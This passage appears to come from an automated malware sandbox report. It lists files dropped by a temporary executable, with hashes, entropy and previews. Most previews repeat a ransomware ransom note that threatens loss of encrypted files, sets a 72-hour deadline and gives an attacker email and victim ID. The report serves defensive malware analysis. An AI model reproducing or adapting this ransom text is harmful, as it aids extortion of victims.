                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.172270907170041
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:wyNQDdmtFspbEsCcfh9iQSTZ3LnvXvSN8z8llmvs8d/kzJllh3U2iGln:9ydmtFsVNxhunCNi8GillhNLn
                                                                                            MD5:6C1646D6B46A7071CD318946E5D1223F
                                                                                            SHA1:83C9F4AB2D029BCED1F6A7FD766F9F79F73288C5
                                                                                            SHA-256:999E3A207DF19B151892840C58E725D0DA0CF9C0A1E615FD9D6AA691798B4000
                                                                                            SHA-512:C47A631408EE0624E93DFA65382ADCF1F2569C25313331903054C974731274DF7C9574475C81CB0E60260AD806C4A848FA874FEC762DE3A1A390463C415B42D7
                                                                                            Malicious:false
                                                                                            Preview:.]..4l.$O...N............as*e..uG.C$..HJ.......-Pt...f...".<...1.J.L..N.6....~.H...tyvKJ.u...F;A.....o.NS........'...,..G.....q8m.1.v.....F.s. ...F)....M.D9D|.(a.C."..g/..r/.....{.gR....J.w".).4..N.\...?R..4.V.....aZ.{HC.9.!_.....'nu........#9.v.R.4..`4L..x4.....c.hD......k)0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.188124299235425
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:1m/MOBnmhHvx/fYCRV9bHb5eq56KrnwmXgsD7EY3frE2n:1mUVxnYoV9/vrd9n
                                                                                            MD5:2943F87578D4FEC61EC31BDFFAE393AC
                                                                                            SHA1:D972A5D687CD120409BFE5C75C999CA4A0E7867A
                                                                                            SHA-256:E2FE7005D38D639ED9E9846B0C978468D36BB35F5E9FC9AB5A369E7E25DF7A58
                                                                                            SHA-512:BC1594510280690D846F26DE6C4ABB38316EEC447D39B46110EC6776D891FA1CC121011757ADF84502A2156021F419DDEF6754BC169BCA13DCEECDFCD79CE965
                                                                                            Malicious:false
                                                                                            Preview:3..8E..d...nx............3S.......H.)Dy.j3..yvyG/C..KIV..r......L3k....<.=.L.G...`..C.F..}Z@..&O_=.F..e..i|.......Kp?#.[m:....!.b/.iLso.s.,..D..6.TlW.:U.].5....o.'.E...@^.b(...q~(......k..+..=B......X.&.\.K..~....H..r....B.ry6..I.A.Di..K...M..lJ77......I.V.(a+.....+.p.l..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.154492260961728
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:RjT8hMuqn35hneF1aBpW56PCGFmrgbRqCHn:RjQhMuqaUY5e1DRqCHn
                                                                                            MD5:0F54E19543D756A66A59EE3C453B3BCC
                                                                                            SHA1:1C65216B55A5C75C9E1EEEE5826A4D7CE72E7368
                                                                                            SHA-256:96D58B5DD2FE81F3D29D52378046897EF801E7D575828CF42F94AF51D383311B
                                                                                            SHA-512:862B03C715FBF9FEBC7594F8EC33961D3AA634441FA46D8CD89559D98226BFD571CADDFF442AD0F1580C7F38205D4A42C9A0235F963A50C3F35C8373CFDA3114
                                                                                            Malicious:false
                                                                                            Preview:.]..>Z...,:@.L..............|x$.6.6....M.....eT..E.O.s...q...=&....._..rQ.......SS...W,......$9..k..Q..Q.\..u~..V.........vz....(.....{......... ...r..+..J.AP..o..>.Ld....*....~.#...>K..;._'.36?.7.j.3.JW.F]..n#.:y.D...h.J<..R..1...Aj.h....;~..r_..(.1....v........R.~....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
